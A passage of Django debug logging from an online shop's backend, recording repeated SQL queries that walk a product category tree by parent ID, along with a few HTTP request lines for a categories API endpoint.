"shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 12:32:32,613 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 12:32:32,617 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 12:32:32,619 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 12:32:32,621 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 12:32:32,623 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 12:32:32,626 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 12:32:32,629 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 12:32:32,633 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 12:32:32,637 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 12:32:32,640 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 12:32:32,643 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 12:32:32,646 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 12:32:32,649 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 12:32:32,651 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 12:32:32,653 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 12:32:32,655 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 12:32:32,658 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 12:32:32,661 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 12:32:32,664 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 12:32:32,666 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 12:32:32,668 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 12:32:32,670 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 12:32:32,672 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 12:32:32,675 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 12:32:32,677 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 12:32:32,680 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 12:32:32,682 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 12:32:32,684 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 12:32:32] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 12:33:46] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 12:37:24,101 utils 4252 140031747061504 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 12:37:24,113 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 12:37:24,121 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 12:37:24,125 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 12:37:24,131 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 12:37:24,134 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 12:37:24,137 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 12:37:24,142 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 12:37:24,145 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 12:37:24,151 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 12:37:24,157 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 12:37:24,161 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 12:37:24,165 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 12:37:24,173 utils 4252 140031747061504 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 12:37:24,179 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 12:37:24,184 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 12:37:24,187 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 12:37:24,193 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 12:37:24,197 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 12:37:24,204 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 12:37:24,209 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 12:37:24,213 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 12:37:24,217 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 12:37:24,222 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 12:37:24,226 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 12:37:24,232 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 12:37:24,236 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 12:37:24,240 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 12:37:24,244 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 12:37:24,248 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 12:37:24,254 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 12:37:24,259 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 12:37:24,263 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 12:37:24,267 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 12:37:24,272 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 12:37:24,279 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 12:37:24,283 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 12:37:24,288 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 12:37:24,292 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 